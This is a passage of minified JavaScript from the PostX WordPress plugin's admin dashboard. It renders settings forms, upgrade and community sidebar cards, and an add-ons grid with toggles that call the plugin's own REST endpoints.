ultp-settings-input-field"},(0,a.createElement)("textarea",{name:e,defaultValue:r}),(0,a.createElement)("span",{className:"ultp-description"},t.desc,t.link&&(0,a.createElement)("a",{className:"settingsLink",target:"_blank",href:t.link,rel:"noreferrer"},t.linkText)));case"shortcode":return(0,a.createElement)("code",{className:"ultp-shortcode-copy"},"[",t.value,"]")}})(n,o,t)))))}))),c=(e,t,n="")=>{const r=n||__("Upgrade to Pro","ultimate-post");return(0,a.createElement)("a",{href:(0,o.Z)(e,t,""),className:"ultp-upgrade-pro-btn",target:"_blank",rel:"noreferrer"},r,"  ➤")},d=({tags:e,func:t,data:n})=>(0,a.createElement)("div",{className:"ultp-addon-lock-container-overlay"},(0,a.createElement)("div",{className:"ultp-addon-lock-container"},(0,a.createElement)("div",{className:"ultp-popup-unlock"},(0,a.createElement)("img",{src:`${ultp_option_panel.url}/assets/img/dashboard/${n.icon}`,alt:"lock icon"}),(0,a.createElement)("div",{className:"title ultp_h5"},n?.title),(0,a.createElement)("div",{className:"ultp-description"},n?.description),c("",e),(0,a.createElement)("button",{onClick:()=>{t(!1)},className:"ultp-popup-close"},r.ZP.close_line)))),u=(e,t,n,r="")=>(0,a.createElement)("a",{href:(0,o.Z)(e,t,""),className:"ultp-primary-button "+r,target:"_blank",rel:"noreferrer"},n),m=(e,t,n,r="")=>(0,a.createElement)("a",{href:(0,o.Z)(e,t,""),className:"ultp-secondary-button "+r,target:"_blank",rel:"noreferrer"},n),f=({proBtnTags:e,FRBtnTag:t})=>{const[n,i]=(0,a.useState)([{id:"go-pro-unlock-more",title:"Go Pro & Unlock More! 🚀",description:"Unlock the full potential of PostX to create and manage professional News Magazines and Blogging sites with complete creative freedom.",features:[__("Access to 40+ Blocks","ultimate-post"),__("Access to 250+ Patterns","ultimate-post"),__("All Starter Packs Access","ultimate-post"),__("Advanced Query Builder","ultimate-post"),__("Ajax Filter and Pagination","ultimate-post"),__("Custom Fonts with Typography","ultimate-post")],visible:!ultp_option_panel.active,buttons:[{type:"primary-alter",icon:r.ZP.rocket,url:"https://www.wpxpo.com/postx/?utm_source=db-postx-setting&utm_medium=upgrade-pro-sidebar&utm_campaign=postx-dashboard#pricing",label:"Upgrade Pro"},{type:"transparent-alter",label:"Free VS Pro"}]},{id:"feature-request",title:"Feature Request",description:"Can't find your desired feature? Let us know your requirements. We will definitely take them into our consideration.",buttons:[{type:"primary",url:"https://www.wpxpo.com/postx/roadmap/?utm_source=postx-menu&utm_medium=DB-roadmap&utm_campaign=postx-dashboard",label:"Request a Feature"}],visible:!0},{id:"web-community",title:"PostX Community",description:"Join the Facebook community of PostX to stay up-to-date and share your thoughts and feedback.",buttons:[{type:"primary",icon:r.ZP.facebook,url:"https://www.facebook.com/groups/gutenbergpostx",label:"Join PostX Community"}],visible:!0},{id:"news-tips",title:"News, Tips & Update",linkIcon:r.ZP.rightArrowLg,links:[{text:"Getting Started with PostX",url:"https://wpxpo.com/docs/postx/getting-started/?utm_source=postx-menu&utm_medium=DB-news-postx_GT&utm_campaign=postx-dashboard"},{text:"How to use the Dynamic Site Builder",url:"https://wpxpo.com/docs/postx/dynamic-site-builder/?utm_source=postx-menu&utm_medium=DB-news-DSB_guide&utm_campaign=postx-dashboard"},{text:"How to use the PostX Features",url:"https://wpxpo.com/docs/postx/postx-features/?utm_source=postx-menu&utm_medium=DB-news-feature_guide&utm_campaign=postx-dashboard"},{text:"PostX Blog",url:"https://www.wpxpo.com/category/postx/?utm_source=postx-menu&utm_medium=DB-news-blog&utm_campaign=postx-dashboard"}],visible:!0},{id:"rating",title:"Show your love",description:"Enjoying PostX? Give us a 5 Star review to support our ongoing work.",buttons:[{type:"primary",url:"https://wordpress.org/support/plugin/ultimate-post/reviews/",label:"Rate it Now"}],visible:!0}]);return(0,a.createElement)("div",{className:"ultp-sidebar-features"},!ultp_option_panel.active&&new Date>=new Date("2024-03-07")&&new Date<=new Date("2024-03-13")&&(0,a.createElement)("div",{className:"ultp-dashboard-pro-features ultp-dash-item-con"},(0,a.createElement)("a",{href:"https://www.wpxpo.com/postx/?utm_source=postx-ad&utm_medium=sidebar-banner&utm_campaign=postx-dashboard#pricing",target:"_blank",style:{textDecoration:"none !important",display:"block"},rel:"noreferrer"},(0,a.createElement)("img",{src:ultp_option_panel.url+"assets/img/dashboard/db_sidebar.jpg",style:{width:"100%",height:"100%",borderRadius:"8px"},alt:"40k+ Banner"}))),n.map(((e,t)=>!1!==e.visible&&(0,a.createElement)("div",{key:t,className:`ultp-sidebar-card-item ultp-sidebar-${e.id}`},"banner"===e.type?(0,a.createElement)("a",{href:e.bannerUrl,target:"_blank",rel:"noreferrer",style:{textDecoration:"none !important",display:"block"}},(0,a.createElement)("img",{src:e.imageUrl,style:{width:"100%",height:"100%",borderRadius:"8px"},alt:e.alt})):(0,a.createElement)(a.Fragment,null,e.title&&(0,a.createElement)("div",{className:"ultp-sidebar-card-title"},__(e.title,"ultimate-post")),e.description&&(0,a.createElement)("span",{className:"ultp-sidebar-card-description"},__(e.description,"ultimate-post")),e.features?(0,a.createElement)("div",{className:"ultp-pro-feature-lists"},e.features.map(((e,t)=>(0,a.createElement)("span",{key:t},r.ZP.right_circle_line," ",__(e,"ultimate-post"))))):e.links?(0,a.createElement)("div",{className:"ultp-sidebar-card-links"},e.links.map(((t,n)=>(0,a.createElement)("a",{className:"ultp-sidebar-card-link",key:n,target:"_blank",href:t.url,rel:"noreferrer"},e.linkIcon&&(0,a.createElement)("span",null,e.linkIcon),__(t.text,"ultimate-post"))))):null,e.buttons&&e.buttons.length>0&&(0,a.createElement)("div",{className:"ultp-sidebar-card-buttons"},e.buttons.map((e=>(({type:e="primary",icon:t,url:n,tags:r,label:i,classname:l=""})=>(0,a.createElement)("a",{href:(0,o.Z)(n,r,""),className:"ultp-"+e+"-button "+l,target:"_blank",rel:"noreferrer",key:i+Math.random()},t&&t,i))({type:e.type,icon:e.icon,url:e.url,tags:e.tags||"",label:e.label,classname:e.classname||""})))))))))}},860:(e,t,n)=>{"use strict";n.d(t,{Z:()=>m});var a=n(7294),r=n(1383),o=n(7763),i=n(4766),l=n(4482),s=n(1389),p=n(8949),c=n(356),d=(n(6129),n(1370)),u=n(6731);const{__}=wp.i18n,m=({integrations:e,generalDiscount:t={}})=>{const[n,m]=(0,a.useState)(""),[f,h]=(0,a.useState)(!1),[g,v]=(0,a.useState)({}),[_,w]=(0,a.useState)(""),[b,x]=(0,a.useState)({state:!1,status:""}),[y,k]=(0,a.useState)(""),[E,C]=(0,a.useState)(!1);let S=d.q;const M=ultp_dashboard_pannel.addons_settings,L=Object.entries(S);L.sort(((e,t)=>e[1].position-t[1].position)),S=Object.fromEntries(L),(0,a.useEffect)((()=>(P(),document.addEventListener("mousedown",A),()=>document.removeEventListener("mousedown",A))),[]);const N=[{label:__("45+ Blocks","ultimate-post"),descp:__("PostX comes with over 45 Gutenberg blocks","ultimate-post")},{label:__("250+ Patterns","ultimate-post"),descp:__("Get full access to all ready post sections","ultimate-post")},{label:__("50+ Starter Sites","ultimate-post"),descp:__("Pre-built websites are ready to import in one click","ultimate-post")},{label:__("Global Styles","ultimate-post"),descp:__("Control the full website’s colors and typography globally","ultimate-post")},{label:__("Dark/Light Mode","ultimate-post"),descp:__("Let your readers switch between light and dark modes","ultimate-post")},{label:__("Advanced Query Builder","ultimate-post"),descp:__("Display/reorder posts, pages, and custom post types","ultimate-post")},{label:__("Dynamic Site Builder","ultimate-post"),descp:__("Dynamically create templates for essential pages","ultimate-post")},{label:__("Ajax Powered Filter","ultimate-post"),descp:__("Let your visitors filter posts by categories and tags","ultimate-post")},{label:__("Advanced Post Slider","ultimate-post"),descp:__("Display posts in engaging sliders and carousels","ultimate-post")},{label:__("SEO Meta Support","ultimate-post"),descp:__("Replace the post excerpts with meta descriptions","ultimate-post")},{label:__("Custom Fonts","ultimate-post"),descp:__("Upload custom fonts per your requirements","ultimate-post")},{label:__("Ajax Powered Pagination","ultimate-post"),descp:__("PostX comes with three types of Ajax pagination","ultimate-post")}],Z=(0,r.t)(),P=()=>{wp.apiFetch({path:"/ultp/v2/get_all_settings",method:"POST",data:{key:"key",value:"value"}}).then((e=>{e.success&&Z.current&&v(e.settings)}))},z=e=>{C(!0),e.preventDefault();const t=new FormData(e.target),n={};for(const a of e.target.elements)a.name&&("checkbox"!==a.type||a.checked?"radio"===a.type?a.checked&&(n[a.name]=a.value):"select-multiple"===a.type?n[a.name]=t.getAll(a.name):"custom_multiselect"==a.dataset.customprop?n[a.name]=a.value?a.value.split(","):[]:n[a.name]=a.value:n[a.name]="");wp.apiFetch({path:"/ultp/v2/save_plugin_settings",method:"POST",data:{settings:n,action:"action",type:"type"}}).then((e=>{C(!1),e.success&&x({status:"success",messages:[e.message],state:!0})}))},A=e=>{e.target.closest(".ultp-addon-settings-popup")||m("")},B=[__("Access to Pro Starter Site Templates","ultimate-post"),__("Access to All Pro Features","ultimate-post"),__("Fully Unlocked Site Builder","ultimate-post"),__("And more…","ultimate-post")],H=[{label:__("Add-Ons","ultimate-post"),value:"addons",integration:!1},{label:__("Integration Add-Ons","ultimate-post"),value:"integration-addons",integration:!0}];return(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp-dashboard-addons-container "+(Object.keys(g).length>0?"":" skeletonOverflow")},!e&&(0,a.createElement)("div",{className:"ultp-gettingstart-message"},(0,a.createElement)("div",{className:"ultp-start-left"},(0,a.createElement)("img",{src:ultp_dashboard_pannel.url+"assets/img/dashboard/dashboard_banner.jpg",alt:"Banner"}),(0,a.createElement)("div",{className:"ultp-start-content"},(0,a.createElement)("span",{className:"ultp-start-text"},__("Enjoy Pro-level Ready Templates!","ultimate-post")),(0,a.createElement)("div",{className:"ultp-start-btns"},(0,l.ac)("https://www.wpxpo.com/postx/starter-sites/?utm_source=db-postx-started&utm_medium=starter-sites&utm_campaign=postx-dashboard&pux_link=dbstartersite","",__("Explore Starter Sites","ultimate-post"),""),(0,l.WO)("https://www.wpxpo.com/postx/?utm_source=db-postx-started&utm_medium=details&utm_campaign=postx-dashboard","",__("Plugin Details","ultimate-post"),"")))),(0,a.createElement)("div",{className:"ultp-start-right"},(0,a.createElement)("div",{className:"ultp-dashborad-banner",style:{cursor:"pointer"},onClick:()=>k((0,a.createElement)("iframe",{width:"1100",height:"500",src:"https://www.youtube.com/embed/FYgSe7kgb6M?autoplay=1",title:__("How to add Product Filter to WooCommerce Shop Page","ultimate-post"),allow:"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share",allowFullScreen:!0}))},(0,a.createElement)("img",{src:ultp_dashboard_pannel.url+"assets/img/dashboard/dashboard_right_banner.jpg",className:"ultp-banner-img"}),(0,a.createElement)("div",{className:"ultp-play-icon-container"},(0,a.createElement)("img",{className:"ultp-play-icon",src:ultp_dashboard_pannel.url+"/assets/img/dashboard/play.png",alt:__("Play","ultimate-post")}),(0,a.createElement)("span",{className:"ultp-animate"}))),(0,a.createElement)("div",{className:"ultp-dashboard-content"},ultp_dashboard_pannel.active?(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp-title _pro"},__("What Do You Need?","ultimate-post")),(0,a.createElement)("div",{className:"ultp-description _pro"},__("Do you have something in mind you want to share? Both we and our users would like to hear about it. Share your ideas on our Facebook group and let us know what you need.","ultimate-post")),(0,l.ac)("https://www.facebook.com/groups/gutenbergpostx","","Share Ideas","")):(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp-title"},__("Do More with","ultimate-post")," ",(0,a.createElement)("span",{style:{color:"var(--postx-primary-color)"}},__("PRO:","ultimate-post"))),(0,a.createElement)("div",{className:"ultp-description"},__("Unlock powerful customizations with PostX Pro:","ultimate-post")),(0,a.createElement)("div",{className:"ultp-lists"},B.map(((e,t)=>(0,a.createElement)("span",{className:"ultp-list",key:t},o.Z.rightMark," ",e)))),(0,a.createElement)("a",{href:"https://www.wpxpo.com/postx/?utm_source=db-postx-started&utm_medium=upgrade-pro-hero&utm_campaign=postx-dashboard#pricing",className:"ultp-upgrade-btn",target:"_blank",rel:"noreferrer"},__("Upgrade to Pro","ultimate-post"),o.Z.rocketPro))))),f&&(0,l.cs)({tags:"addons_popup",func:e=>{h(e)},data:{icon:"addon_lock.svg",title:__("Unlock All Addons of PostX","ultimate-post"),description:__("Sorry, this addon is not available in the free version of PostX. Please upgrade to a pro plan to unlock all pro addons and features of PostX.","ultimate-post")}}),(0,a.createElement)("div",{className:"ultp-addons-container-grid"},(0,a.createElement)("div",{className:"ultp-addons-items"},H.map((t=>(0,a.createElement)("div",{key:t.value,className:"ultp-addon-group"},(0,a.createElement)("div",{className:"ultp_h2 ultp-addon-parent-heading"},t.label),Object.keys(g).length>0?((e=!1)=>(0,a.createElement)("div",{className:"ultp-addons-grid "+(e?"":"ultp-gs")},Object.keys(S).map(((t,r)=>{const o=S[t];if(e&&!o.integration||!e&&o.integration)return;let s=!0;return s=!("true"!=g[t]&&1!=g[t]||o.is_pro&&!ultp_dashboard_pannel.active),(0,a.createElement)("div",{className:"ultp-addon-item",key:t},(0,a.createElement)("div",{className:"ultp-addon-item-contents",style:{paddingBottom:o.notice?"10px":"auto"}},(0,a.createElement)("div",{className:"ultp-addon-item-name"},(0,a.createElement)("img",{src:`${ultp_dashboard_pannel.url}assets/img/addons/${o.img}`,alt:o.name}),(0,a.createElement)("div",{className:"ultp_h6 ultp-addon-item-title"},o.name,o?.new&&(0,a.createElement)("span",{className:"ultp-new-tag"},"New")),(0,a.createElement)("div",{className:"ultp-dash-control-options ultp-ml-auto"},(0,a.createElement)("input",{type:"checkbox",datatype:t,className:"ultp-addons-enable "+(o.is_pro&&!ultp_dashboard_pannel.active?"disabled":""),id:t,checked:s,onChange:()=>{(e=>{const t="true"==g[e]?"false":"true";!ultp_dashboard_pannel.active&&S[e].is_pro?(v({...g,[e]:"false"}),h(!0)):(v({...g,[e]:t}),wp.apiFetch({path:"/ultp/v2/addon_block_action",method:"POST",data:{key:e,value:t}}).then((n=>{n.success&&(["ultp_templates","ultp_custom_font","ultp_builder"].includes(e)&&(document.getElementById("postx-submenu-"+e.replace("templates","saved_templates").replace("ultp_","").replace("_","-")).style.display="true"==t?"block":"none",document.getElementById(e.replace("templates","saved_templates").replace("ultp_","ultp-dasnav-").replace("_","-")).style.display="true"==t?"":"none"),setTimeout((function(){x({status:"success",messages:[n.message],state:!0})}),400))})))})(t)}}),(0,a.createElement)("label",{htmlFor:t,className:"ultp-control__label"},o.is_pro&&!ultp_dashboard_pannel.active&&(0,a.createElement)("span",{className:"dashicons dashicons-lock"})))),(0,a.createElement)("div",{className:"ultp-description"},o.desc,o.notice&&(0,a.createElement)("div",{className:"ultp-description-notice"},o.notice)),o.required&&o.required?.name&&(0,a.createElement)("span",{className:"ultp-plugin-required"}," ",__("This addon required this plugin:","ultimate-post"),o.required.name),o.is_pro&&!ultp_dashboard_pannel.active&&(0,a.createElement)("div",{onClick:()=>{h(!0)},className:"ultp-pro-lock"},(0,a.createElement)("span",null,"PRO"))),(0,a.createElement)("div",{className:"ultp-addon-item-actions ultp-dash-control-options"},(0,a.createElement)("div",{className:"ultp-docs-action"},o.live&&(0,a.createElement)("a",{href:o.live.replace("live_demo_args",`?utm_source=${e?"db-postx-integration":"db-postx-addons"}&utm_medium=${e?"":t+"-"}demo&utm_campaign=postx-dashboard`),className:"ultp-option-tooltip",target:"_blank",rel:"noreferrer"},i.ZP.desktop,__("Demo","ultimate-post")),o.docs&&(0,a.createElement)("a",{href:o.docs+(e?"?utm_source=db-postx-integration":"?utm_source=db-postx-addons")+"&utm_medium=docs&utm_campaign=postx-dashboard",className:"ultp-option-tooltip",target:"_blank",rel:"noreferrer"},i.ZP.media_document,__("Docs","ultimate-post")),o.video&&(0,a.createElement)("a",{href:o.video,className:"ultp-option-tooltip",target:"_blank",rel:"noreferrer"},i.ZP.rightAngle,__("Video","ultimate-post")),M[t]&&(0,a.createElement)("div",{className:"ultp-popup-setting",onClick:()=>{m(t)}},i.ZP.setting),n==t&&(0,a.createElement)("div",{className:"ultp-addon-settings"},(0,a.createElement)("div",{className:"ultp-addon-settings-popup"},M[t]&&(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp-addon-settings-title"},(0,a.createElement)("div",{className:"ultp_h6"},o.name,": ",__("Settings","ultimate-post"))),(0,a.createElement)("form",{onSubmit:z,action:""},(0,a.createElement)("div",{className:"ultp-addon-settings-body"},"ultp_frontend_submission"===t&&(0,a.createElement)(u.Z,{attr:M[t].attr,settings:g,setSettings:v}),"ultp_frontend_submission"!=t&&(0,l.DC)(M[t].attr,g),(0,a.createElement)("div",{className:"ultp-data-message"})),(0,a.createElement)("div",{className:"ultp-addon-settings-footer"},(0,a.createElement)("button",{type:"submit",className:"cursor ultp-primary-button "+(E?"onloading":"")},__("Save Settings","ultimate-post"),E&&i.ZP.refresh))),(0,a.createElement)("button",{onClick:()=>{m("")},className:"ultp-popup-close"})))))))}))))(!!t.integration):(0,a.createElement)("div",{className:"ultp-addons-grid "+(e?"":"ultp-gs")},Array(6).fill(1).map(((e,t)=>(0,a.createElement)("div",{key:t,className:"ultp-addon-item"},(0,a.createElement)("div",{className:"ultp-addon-item-contents"},(0,a.createElement)("div",{className:"ultp-addon-item-name"},(0,a.createElement)(p.Z,{type:"custom_size",c_s:{size1:50,unit1:"px",size2:50,unit2:"px",br:18}}),(0,a.createElement)(p.Z,{type:"custom_size",c_s:{size1:190,unit1:"px",size2:28,unit2:"px",br:4}})),(0,a.createElement)("div",{className:"ultp-description"},(0,a.createElement)(p.Z,{type:"custom_size",classes:"loop",c_s:{size1:100,unit1:"%",size2:14,unit2:"px",br:2}}),(0,a.createElement)(p.Z,{type:"custom_size",classes:"loop",c_s:{size1:70,unit1:"%",size2:14,unit2:"px",br:2}}))),(0,a.createElement)("div",{className:"ultp-addon-item-actions ultp-dash-control-options"},(0,a.createElement)(p.Z,{type:"custom_size",c_s:{size1:40,unit1:"px",size2:20,unit2:"px",br:8}}),(0,a.createElement)("div",{className:"ultp-docs-action"},(0,a.createElement)(p.Z,{type:"custom_size",c_s:{size1:60,unit1:"px",size2:22,unit2:"px",br:2}}),(0,a.createElement)(p.Z,{type:"custom_size",c_s:{size1:50,unit1:"px",size2:22,unit2:"px",br:2}}),(0,a.createElement)(p.Z,{type:"custom_size",c_s:{size1:60,unit1:"px",size2:22,unit2:"px",br:2}}))))))),!e&&(0,a.createElement)("div",{className:"ultp_dash_key_features"},(0,a.createElement)("div",{className:"ultp_h2"},__("Key Features of PostX","ultimate-post")),(0,a.createElement)("div",{className:"ultp_dash_key_features_content"},N?.map(((e,t)=>(0,a.createElement)("div",{key:t},(0,a.createElement)("div",{className:"ultp_dash_key_features_label"},e.label),(0,a.createElement)("div",{className:"ultp-description"},e.descp)))))))))),e&&(0,a.createElement)(l.gR,{FRBtnTag:"settingsFR",proBtnTags:"postx_dashboard_settings"}))),b.state&&(0,a.createElement)(c.Z,{delay:2e3,toastMessages:b,setToastMessages:x}),y&&(0,a.createElement)(s.Z,{title:__("Postx Intro","ultimate-post"),modalContent:y,setModalContent:k}))}},6731:(e,t,n)=>{"use strict";n.d(t,{Z:()=>i});var a=n(7294),r=n(4190),o=n(4766);const{__}=wp.i18n,i=({attr:e,settings:t,setSettings:n})=>{const i=e,l=({multikey:e,value:r,multiValue:i})=>{var l;const[s,p]=(0,a.useState)([...i]),[c,d]=(0,a.useState)(!1),[u,m]=(0,a.useState)(null!==(l=r.options)&&void 0!==l?l:{}),[f,h]=(0,a.useState)(""),g=e=>{e.target.closest(".ultp-ms-container")||d(!1)};return(0,a.useEffect)((()=>(document.addEventListener("mousedown",g),()=>document.removeEventListener("mousedown",g))),[]),(0,a.useEffect)((()=>{setTimeout((()=>{const e=Object.fromEntries(Object.entries(r.options).filter((([e,t])=>t.toLowerCase().includes(f.toLowerCase())||e.toLowerCase().includes(f.toLowerCase()))));m(e)}),500)}),[f]),(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("input",{type:"hidden",name:e,value:s,"data-customprop":"custom_multiselect"}),(0,a.createElement)("div",{className:"ultp-ms-container"},(0,a.createElement)("div",{onClick:()=>d(!c),className:"ultp-ms-results-con cursor"},(0,a.createElement)("div",{className:"ultp-ms-results"},s.length>0?s?.map(((i,l)=>(0,a.createElement)("span",{key:l,className:"ultp-ms-selected"},r.options[i],(0,a.createElement)("span",{className:"ultp-ms-remove cursor",onClick:a=>{a.stopPropagation(),(a=>{const r=s.filter((e=>e!=a));p(r),n({...t,[e]:r})})(i)}},o.ZP.close_circle_line)))):(0,a.createElement)("span",null,__("Select options"))),(0,a.createElement)("span",{onClick:()=>d(!c),className:"ultp-ms-results-collapse cursor"},o.ZP.collapse_bottom_line)),c&&u&&(0,a.createElement)("div",{className:"ultp-ms-options"},(0,a.createElement)("input",{type:"text",className:"ultp-multiselect-search",value:f,onChange:e=>h(e.target.value)}),Object.keys(u)?.map(((o,i)=>(0,a.createElement)("span",{className:"ultp-ms-option cursor",onClick:()=>(a=>{let o=[];if(-1==s.indexOf(a)&&"all"!=a&&(o=[...s,a]),"all"===a){const e=Object.fromEntries(Object.entries(r.options).filter((([e,t])=>!t.toLowerCase().includes("all"))));o=Object.keys(e)}p(o),n({...t,[e]:o})})(o),key:i,value:o},u[o]))))))};return(0,a.createElement)(a.Fragment,null,Object.keys(i).map(((e,o)=>{const s=i[e];return(0,a.createElement)("span",{key:o},"hidden"==s.type&&(0,a.createElement)("input",{key:e,type:"hidden",name:e,defaultValue:s.value}),"hidden"!=s.type&&(0,a.createElement)(a.Fragment,null,"heading"==s.type&&(0,a.createElement)("h2",{className:"ultp-settings-heading"},s.label)&&(0,a.createElement)(a.Fragment,null,s.desc&&(0,a.createElement)("div",{className:"ultp-settings-subheading"},s.desc)),"heading"!=s.type&&((e,n)=>{let a=!0;return n.hasOwnProperty("depends_on")&&n.depends_on.forEach((e=>{"=="==e.condition&&t[e.key]!=e.value&&(a=!1)})),a})(0,s)&&(0,a.createElement)("div",{className:"ultp-settings-wrap"},s.label&&(0,a.createElement)("strong",null,s.label,s.tooltip&&(0,a.createElement)(r.Z,{placement:"bottom",content:s.tooltip},(0,a.createElement)("span",{className:" cursor dashicons dashicons-editor-help"}))),(0,a.createElement)("div",{className:"ultp-settings-field-wrap"},((e,r,o)=>{const i=t.hasOwnProperty(e)?t[e]:t.default?t.default:"multiselect"==r.type?[]:"",s=e=>{n((t=>"checkbox"===e.target.type?{...t,[e.target.name]:e.target.checked?"yes":"no"}:{...t,[e.target.name]:e.target.value}))};switch(r.type){case"select":return(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("select",{defaultValue:i,name:e,id:e,onChange:s},Object.keys(r.options).map(((e,t)=>(0,a.createElement)("option",{key:t,value:e},r.options[e])))),r.desc&&(0,a.createElement)("span",{className:"ultp-description"},r.desc));case"radio":return(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("div",{className:"ultp-field-radio"},(0,a.createElement)("div",{className:"ultp-field-radio-items"},Object.keys(r.options).map(((t,n)=>(0,a.createElement)("div",{key:n,className:"ultp-field-radio-item"},(0,a.createElement)("input",{type:"radio",id:t,name:e,value:t,defaultChecked:t==i,onChange:s}),(0,a.createElement)("label",{htmlFor:t},r.options[t])))))),r.desc&&(0,a.createElement)("span",{className:"ultp-description"},r.desc));case"color":return(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("input",{type:"text",defaultValue:i,className:"ultp-color-picker"}),(0,a.createElement)("span",{className:"ultp-settings-input-field"},(0,a.createElement)("input",{type:"text",name:e,className:"ultp-color-code",defaultValue:i})),r.desc&&(0,a.createElement)("span",{className:"ultp-description"},r.desc));case"number":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-input-field"},(0,a.createElement)("input",{type:"number",name:e,defaultValue:i,onChange:s}),r.desc&&(0,a.createElement)("span",{className:"ultp-description"},r.desc));case"switch":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-field-inline"},(0,a.createElement)("input",{value:"yes",type:"checkbox",name:e,defaultChecked:"yes"==i||"on"==i,onChange:s}),r.desc&&(0,a.createElement)("span",{className:"ultp-description"},r.desc));case"switchButton":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-field-inline"},(0,a.createElement)("input",{type:"checkbox",value:"yes",name:e,defaultChecked:"yes"==i||"on"==i}),r.desc&&(0,a.createElement)("span",{className:"ultp-description"},r.desc),(0,a.createElement)("div",null,(0,a.createElement)("span",{id:"postx-regenerate-css",className:`ultp-upgrade-pro-btn cursor ${"yes"==i?"active":""} `},(0,a.createElement)("span",{className:"dashicons dashicons-admin-generic"}),(0,a.createElement)("span",{className:"ultp-text"},__("Re-Generate Font Files","ultimate-post")))));case"multiselect":const t=Array.isArray(i)?i:[i];return(0,a.createElement)(l,{multikey:e,value:r,multiValue:t});case"text":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-input-field"},(0,a.createElement)("input",{type:"text",name:e,defaultValue:i,onChange:s}),(0,a.createElement)("span",{className:"ultp-description"},r.desc,r.link&&(0,a.createElement)("a",{className:"settingsLink",target:"_blank",href:r.link,rel:"noreferrer"},r.linkText)));case"textarea":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-input-field"},(0,a.createElement)("textarea",{name:e,defaultValue:i}),(0,a.createElement)("span",{className:"ultp-description"},r.desc,r.link&&(0,a.createElement)("a",{className:"settingsLink",target:"_blank",href:r.link,rel:"noreferrer"},r.linkText)));case"shortcode":return(0,a.createElement)("code",{className:"ultp-shortcode-copy"},"[",r.value,"]")}})(e,s)))))})))}},1370:(e,t,n)=>{"use strict";n.d(t,{q:()=>a});const{__}=wp.i18n,a={ultp_wpbakery:{name:"WPBakery",desc:__("It lets you use PostX’s Gutenberg blocks in the WPBakery Builder by using the Saved Template Addon.","ultimate-post"),img:"wpbakery.svg",is_pro:!1,docs:"https://wpxpo.com/docs/postx/add-on/wpbakery-page-builder-addon/",live:"https://www.wpxpo.com/postx/page-builder-integration/live_demo_args",video:"https://www.youtube.com/watch?v=f99NZ6N9uDQ",position:20,integration:!0},ultp_templates:{name:"Saved Templates",desc:__("Create unlimited templates by converting Gutenberg blocks into shortcodes to use them anywhere.","ultimate-post"),img:"saved-template.svg",is_pro:!1,docs:"https://wpxpo.com/docs/postx/add-on/shortcodes-support/",live:"https://www.wpxpo.com/postx/addons/save-template/live_demo_args",video:"https://www.youtube.com/watch?v=6ydwiIp2Jkg",position:10},ultp_table_of_content:{name:"Table of Contents",desc:__("It enables a highly customizable block to the Gutenberg blocks library to display the Table of Contents.","ultimate-post"),img:"table-of-content.svg",is_pro:!1,docs:"https://wpxpo.com/docs/postx/add-on/table-of-content/",live:"https://www.wpxpo.com/postx/addons/table-of-content/live_demo_args",video:"https://www.youtube.com/watch?v=xKu_E720MkE",position:25},ultp_oxygen:{name:"Oxygen",desc:__("It lets you use PostX’s Gutenberg blocks in the Oxygen Builder by using the Saved Template Addon.","ultimate-post"),img:"oxygen.svg",is_pro:!1,docs:"https://wpxpo.com/docs/postx/add-on/oxygen-builder-addon/",live:"https://www.wpxpo.com/postx/page-builder-integration/live_demo_args",video:"https://www.youtube.com/watch?v=iGik4w3ZEuE",position:20,integration:!0},ultp_elementor:{name:"Elementor",desc:__("It lets you use PostX’s Gutenberg blocks in the Elementor Builder by using the Saved Template Addon.","ultimate-post"),img:"elementor-icon.svg",is_pro:!1,live:"https://www.wpxpo.com/postx/page-builder-integration/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/elementor-addon/",video:"https://www.youtube.com/watch?v=GJEa2_Tow58",position:20,integration:!0},ultp_dynamic_content:{name:"Dynamic Content",desc:__("Insert dynamic, real-time content like excerpts, dates, author names, etc. in PostX blocks.","ultimate-post"),img:"dynamic-content.svg",is_pro:!1,docs:"https://wpxpo.com/docs/postx/postx-features/dynamic-content/",live:"https://www.wpxpo.com/create-custom-fields-in-wordpress/live_demo_args",video:"https://www.youtube.com/watch?v=4oeXkHCRVCA",position:6,notice:"ACF, Meta Box and Pods (PRO)",new:!0},ultp_divi:{name:"Divi",desc:__("It lets you use PostX’s Gutenberg blocks in the Divi Builder by using the Saved Template Addon.","ultimate-post"),img:"divi.svg",is_pro:!1,live:"https://www.wpxpo.com/postx/page-builder-integration/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/divi-addon/?utm_source=postx-menu&utm_medium=addons-demo&utm_campaign=postx-dashboard",video:"https://www.youtube.com/watch?v=p9RKTYzqU48",position:20,integration:!0},ultp_custom_font:{name:"Custom Font",desc:__("It allows you to upload custom fonts and use them on any PostX blocks with all typographical options.","ultimate-post"),img:"custom_font.svg",is_pro:!1,live:"https://www.wpxpo.com/wordpress-custom-fonts/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/custom-fonts/",video:"https://www.youtube.com/watch?v=tLqUpj_gL-U",position:7},ultp_bricks_builder:{name:"Bricks Builder",desc:__("It lets you use PostX’s Gutenberg blocks in the Bricks Builder by using the Saved Template Addon.","ultimate-post"),img:"bricks.svg",is_pro:!1,live:"https://www.wpxpo.com/postx/page-builder-integration/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/bricks-builder-addon/",video:"https://www.youtube.com/watch?v=t0ae3TL48u0",position:20,integration:!0},ultp_beaver_builder:{name:"Beaver",desc:__("It lets you use PostX’s Gutenberg blocks in the Beaver Builder by using the Saved Template 